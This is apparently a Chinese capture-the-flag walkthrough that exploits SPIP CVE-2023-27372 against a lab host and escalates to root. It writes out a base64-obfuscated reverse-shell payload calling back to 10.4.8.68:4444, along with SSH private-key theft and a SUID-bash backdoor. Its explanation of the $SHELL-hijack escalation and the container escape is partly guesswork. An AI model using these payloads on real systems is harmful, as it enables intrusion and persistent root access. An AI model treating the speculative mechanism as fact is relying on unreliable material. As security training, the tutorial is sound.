渗透测试实战教学：从Web漏洞到容器逃逸提权<\/strong><\/h3>
文档版本：<\/strong> 1.0
目标读者：<\/strong> 具备一定Linux和网络安全基础的渗透测试学习者
教学目标：<\/strong> 通过一个真实案例，掌握综合运用信息收集、漏洞利用、权限提升和容器逃逸技术的完整流程。<\/p>

第一阶段：信息收集与侦查<\/strong><\/h4>
任何渗透测试的开始都是尽可能多地收集目标信息。<\/p>
1. 端口扫描<\/strong>
虽然原文未明确提及初始的端口扫描命令，但根据后续操作，可以推断出目标开放了80端口（HTTP服务）。通常我们会使用 nmap<\/code> 进行初步侦查。<\/p>
教学命令示例：<\/strong> nmap -sS -sV -O 10.201.99.17 <\/span><\/span><\/code><\/pre><\/li> 命令解释：<\/strong> -sS<\/code>: TCP SYN 扫描，一种快速且相对隐蔽的扫描方式。<\/li> -sV<\/code>: 版本探测，尝试识别运行在开放端口上的服务及其版本。<\/li> -O<\/code>: 操作系统探测。<\/li> <\/ul> <\/li> 关键点：<\/strong> 信息收集的全面性决定了后续攻击面的宽度。务必记录所有开放的端口和服务版本。<\/li> <\/ul> 2. 目录枚举<\/strong> 发现80端口的Web服务后，下一步是寻找隐藏的目录或文件，这常常是应用的入口点或配置泄露点。<\/p> 实战命令：<\/strong> gobuster dir -u http:\/\/10.201.99.17\/ -w directory-list-2.3-medium.txt <\/span><\/span><\/code><\/pre><\/li> 命令解释：<\/strong> gobuster<\/code>: 一款用Go语言编写的目录\/子域名爆破工具。<\/li> dir<\/code>: 指定使用目录爆破模式。<\/li> -u http:\/\/10.201.99.17\/<\/code>: 指定目标URL。<\/li> -w directory-list-2.3-medium.txt<\/code>: 指定用于爆破的字典文件。directory-list-2.3-medium.txt<\/code> 是一个常用的字典，包含大量常见的目录名。<\/li> <\/ul> <\/li> 关键点：<\/strong> 选择合适的字典至关重要。对于不同类型的应用（如博客、管理后台、API接口），可能需要使用专门的字典。<\/li> <\/ul> 3. 应用指纹识别<\/strong> 访问扫描到的目录后，发现这是一个使用 SPIP<\/strong> 搭建的网站。SPIP是一个法国流行的开源内容发布系统。<\/p> 关键点：<\/strong> 识别出具体的技术栈（如CMS、框架、编程语言）后，就可以有针对性地搜索该技术的已知漏洞。<\/li> <\/ul> 第二阶段：漏洞利用与初始访问<\/strong><\/h4> 1. 漏洞搜索与确认<\/strong> 搜索“SPIP 漏洞”，发现存在 CVE-2023-27372<\/strong>。这是一个高危的远程代码执行漏洞，影响特定版本的SPIP。<\/p> 漏洞原理简述：<\/strong> 该漏洞源于SPIP对用户输入的反序列化处理不当，攻击者可以构造恶意的序列化字符串，在目标服务器上执行任意PHP代码。<\/li> 关键点：<\/strong> 在利用公开漏洞前，务必在测试环境中验证其有效性和影响范围，避免对目标系统造成意外损害。<\/li> <\/ul> 2. 构造并执行Payload<\/strong> 利用漏洞的关键是构造能够被服务器解析并执行的恶意载荷。<\/p> 实战Payload分析：<\/strong> 基础验证Payload：<\/strong> oubli=s:19:"<?php phpinfo(); ?>";<\/code><\/p> 这是一个简单的反序列化Payload，如果漏洞存在，服务器会执行 phpinfo()<\/code> 函数，泄露大量服务器配置信息。这常用于漏洞验证。<\/li> <\/ul> <\/li> 反向Shell Payload：<\/strong><\/p> 93<\/span>:<\/span>"<?Php system('echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuNC44LjY4LzQ0NDQgMD4mMQ== |base64 -d|bash'); ?>"<\/span> <\/span><\/span><\/code><\/pre> 核心技巧（Base64编码）：<\/strong> 为了绕过可能的字符过滤或编码问题，将真正的攻击指令用Base64编码。<\/li> 解码后命令：<\/strong> echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuNC44LjY4LzQ0NDQgMD4mMQ== | base64 -d | bash<\/code> 这行命令会解码Base64字符串并交给bash<\/code>执行。<\/li> 解码真正的Payload：<\/strong> c2ggLWkgPiYgL2Rldi90Y3AvMTAuNC44LjY4LzQ0NDQgMD4mMQ==<\/code> 解码后是 sh -i >& \/dev\/tcp\/10.4.8.68\/4444 0>&1<\/code><\/strong>。<\/li> 反向Shell原理：<\/strong> 这条命令会在目标机器上启动一个交互式Shell，并将其输入\/输出重定向到攻击者机器的 10.4.8.68:4444<\/code> 端口。攻击者需要提前在本机使用 nc -lvnp 4444<\/code> 监听该端口，等待连接。<\/li> <\/ul> <\/li> <\/ol> <\/li> 关键点：<\/strong> 反向Shell是突破网络边界（如防火墙）的常用技术，因为它是由内网服务器主动连接外网攻击者，通常比攻击者直接连接内网服务更容易成功。<\/li> <\/ul> 3. 获取初始Shell<\/strong> Payload执行成功后，攻击者的nc<\/code>监听端会接收到来自目标的连接，获得一个初始的Shell会话，权限是Web服务进程用户（本例中是 www-data<\/code>）。<\/p> 第三阶段：权限提升 - 从 www-data 到 think<\/strong><\/h4> 在低权限Shell中，目标是获取更高权限用户的访问权。<\/p> 1. 初步信息收集（目标系统内部）<\/strong><\/p> 查看日志：<\/strong> 作者提到查看日志发现提示“没有密钥了”，这可能意味着系统有生成或使用密钥的机制，这往往是提权的线索。<\/li> 枚举用户：<\/strong> 通过查看 \/etc\/passwd<\/code> 文件，发现系统中存在 root<\/code> 和 think<\/code> 两个用户。<\/li> 关键点：<\/strong> 在Linux中，提权的路径常常是：www-data<\/code> -> 普通用户（think）<\/code> -> root<\/code>。首先需要获取一个普通用户的权限。<\/li> <\/ul> 2. 获取用户think的SSH私钥<\/strong><\/p> 发现密钥：<\/strong> 在 \/home\/think\/.ssh\/<\/code> 目录下发现了 id_rsa<\/code> 文件，这是SSH的私钥文件。<\/li> 操作步骤：<\/strong> 将 id_rsa<\/code> 文件内容复制到攻击者本地机器的一个文件中（例如 think_key<\/code>）。<\/li> 修改私钥文件的权限为600，确保只有所有者可读：chmod 600 think_key<\/code>。<\/li> 使用私钥登录到目标机的 think<\/code> 用户：ssh -i think_key think@10.201.99.17<\/code>。<\/li> <\/ol> <\/li> 关键点：<\/strong> SSH私钥是极其敏感的文件。管理员错误地将私钥留在可被低权限用户读取的位置，是一种常见的安全配置错误。成功登录后，我们找到了第一个标志文件 user.txt<\/code>。<\/li> <\/ul> 第四阶段：权限提升 - 从 think 到 root（容器环境逃逸）<\/strong><\/h4> 这是本次渗透测试中最具技术含量的部分，涉及对特殊系统文件的深入分析。<\/p> 1. 发现可疑的可执行文件<\/strong> 在枚举系统时，发现了一个不寻常的可执行文件 \/usr\/sbin\/run_container<\/code>。通常，\/usr\/sbin<\/code> 存放系统管理程序，而 run_container<\/code> 这个名字强烈暗示目标系统可能运行在容器内。<\/p> 关键点：<\/strong> 容器环境下的提权（容器逃逸）与物理机\/虚拟机上的提权思路有所不同，需要寻找容器与宿主机之间的安全边界弱点。<\/li> <\/ul> 2. 分析可疑文件<\/strong> 使用 strings<\/code> 命令查看 \/usr\/sbin\/run_container<\/code> 的可打印字符串。<\/p> 实战命令：<\/strong> strings \/usr\/sbin\/run_container<\/code><\/li> 发现：<\/strong> 分析结果显示，该程序会使用 \/bin\/bash<\/code> 来执行另一个脚本 \/opt\/run_container.sh<\/code>。<\/li> 关键点：<\/strong> strings<\/code> 是一个快速进行初步逆向分析的工具，无需深究二进制代码即可获取关键信息。<\/li> <\/ul> 3. 环境侦察与尝试<\/strong><\/p> 检查Shell环境：<\/strong> 执行 echo $SHELL<\/code> 发现当前Shell是 \/usr\/sbin\/ash<\/code>（一个轻量级Shell，常用于容器环境）。这表明我们确实在一个受限的容器环境中。<\/li> 尝试修改脚本：<\/strong> 尝试直接修改 \/opt\/run_container.sh<\/code> 来达到提权目的（例如，添加 chmod +s \/bin\/bash<\/code> 给bash赋予SUID权限），但发现没有写入权限。<\/li> 关键点：<\/strong> 遇到障碍时，需要灵活变通。既然不能直接写脚本，就思考程序是如何调用这个脚本的。<\/li> <\/ul> 4. 利用Shell劫持进行容器逃逸<\/strong> 这是本次攻击的精髓所在。作者利用了环境变量 $SHELL<\/code> 和程序的执行逻辑。<\/p> 攻击原理：<\/strong><\/p> \/usr\/sbin\/run_container<\/code> 程序在内部通过 system()<\/code> 或类似函数调用 \/bin\/bash \/opt\/run_container.sh<\/code>。<\/li> 在某些实现中，如果调用路径不是绝对路径，或者Shell的启动方式有问题，程序可能会依赖 $SHELL<\/code> 环境变量来寻找解释器。<\/li> 攻击者可以控制 $SHELL<\/code> 环境变量，将其指向一个恶意的自定义脚本。<\/li> <\/ol> <\/li> 实战步骤：<\/strong><\/p> 创建恶意“Shell”脚本：<\/strong> echo -e '#!\/usr\/bin\/perl\nexec "\/bin\/sh"'<\/span> > \/dev\/shm\/test.pl <\/span><\/span>chmod +x \/dev\/shm\/test.pl <\/span><\/span><\/code><\/pre> 这个Perl脚本的作用是执行 \/bin\/sh<\/code>。我们将其作为我们的“假Shell”。<\/li> <\/ul> <\/li> 劫持SHELL环境变量：<\/strong> export SHELL=<\/span>\/dev\/shm\/test.pl <\/span><\/span><\/code><\/pre> 这会告诉系统，当前用户的默认Shell是我们刚创建的恶意脚本。<\/li> <\/ul> <\/li> 执行目标程序：<\/strong> 运行 \/usr\/sbin\/run_container<\/code>。程序在启动Bash来执行脚本时，可能因为环境变量的设置，实际执行的是 \/dev\/shm\/test.pl<\/code>。<\/li> \/dev\/shm\/test.pl<\/code> 执行后，会启动一个 \/bin\/sh<\/code> 进程。关键在于，这个新进程可能会继承更高的权限，例如root权限<\/strong>，因为 \/usr\/sbin\/run_container<\/code> 很可能是一个以root权限运行的程序（SUID或由root的cron任务触发）。<\/li> <\/ul> <\/li> <\/ol> <\/li> 关键点：<\/strong> 这种技术被称为“Shell逃逸”或“环境变量劫持”。其成功取决于目标程序的编写方式以及它对环境变量的信任程度。在容器环境中，由于为了轻量化而缺少完整的安全机制，这种攻击更容易成功。<\/p> <\/li> <\/ul> 5. 完成提权<\/strong> 通过Shell劫持获得root权限的Shell后，最后的操作就很简单了：<\/p> 此时已经可以自由修改 \/opt\/run_container.sh<\/code>。<\/li> 写入提权命令：echo -e '#!\/bin\/bash\nchmod +s \/bin\/bash' > \/opt\/run_container.sh<\/code>。这条命令会给 \/bin\/bash<\/code> 设置SUID位，从而建立一个持久的后门。<\/li> 再次执行 \/usr\/sbin\/run_container<\/code> 使脚本生效。之后，任何用户执行 \/bin\/bash -p<\/code> 都可以获得一个root Shell。<\/li> <\/ol> 最终，成功获取系统最高权限，渗透测试目标完成。<\/p> 总结与反思<\/strong><\/h4> 本次实战演练涵盖了现代渗透测试的核心阶段：<\/p> 信息收集：<\/strong> 使用 nmap<\/code>, gobuster<\/code> 等工具。<\/li> 漏洞研究与应用：<\/strong> 针对SPIP的CVE-2023-27372漏洞进行研究和利用，使用Base64编码和反向Shell技术。<\/li> 横向移动：<\/strong> 通过窃取SSH私钥从 www-data<\/code> 权限提升到 think<\/code> 用户权限。<\/li> 纵向提权（容器逃逸）：<\/strong> 通过分析二进制文件、利用环境变量劫持（Shell逃逸）技术，从容器内的普通用户权限提升到宿主机（或更高权限容器）的root权限。<\/li> <\/ol> 安全建议：<\/strong><\/p> 及时更新：<\/strong> 尽快为SPIP等第三方组件打上安全补丁。<\/li> 最小权限原则：<\/strong> Web服务应使用低权限用户运行，并严格限制其对系统文件的访问。<\/li> 安全配置：<\/strong> 避免将SSH私钥等敏感信息存放在可被其他用户访问的位置。<\/li> 安全开发：<\/strong> 在编写特权程序时，应使用绝对路径，并在调用子进程时清空或严格校验环境变量。<\/li> 容器安全：<\/strong> 容器应以非root用户运行，并减少不必要的权限和能力。<\/li> <\/ul>